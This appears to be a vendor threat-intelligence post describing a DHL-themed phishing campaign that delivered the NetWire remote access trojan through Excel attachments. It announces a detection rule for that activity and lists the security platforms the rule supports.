NetWire is a publicly-available Remote Access Trojan that is a part of the NetWiredRC malware family used by cybercriminals since 2012. Its primary functionality is focused on credentials stealing and keylogging, but it also has remote control capabilities. Adversaries often distribute NetWire through malspam and phishing emails.
In a recent campaign, cybercriminals targeted users in Germany and disguised phishing emails as German courier, parcel, and express mail service DHL. The attackers used MS Excel documents as a malicious attachment. It activates a PowerShell command to download two files from Pastebin and perform character replacements on them to decode the DLL file, download obfuscated NetWire RAT, and then use decoded DLL to inject trojan into the legitimate process.
New threat hunting rule by Osman Demir uncovers PowerShell command to download malicious files and process injection into a legitimate Windows file.
Netwire RAT via paste.ee and MS Excel – https://tdm.socprime.com/tdm/info/999rWf0zExpC/YyFoJ3IBjwDfaYjKeoqF/?p=1
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, Logpoint, Humio
EDR: Windows Defender ATP, Carbon Black, Elastic Endpoint
Tactics: Command and Control
Techniques: Remote Access Tools (T1219)
You can also check the community rule Netwire RAT detection via WScript: https://tdm.socprime.com/tdm/info/uI7Og7wR6TUZ/SDkzRW4BLQqskxffI-01/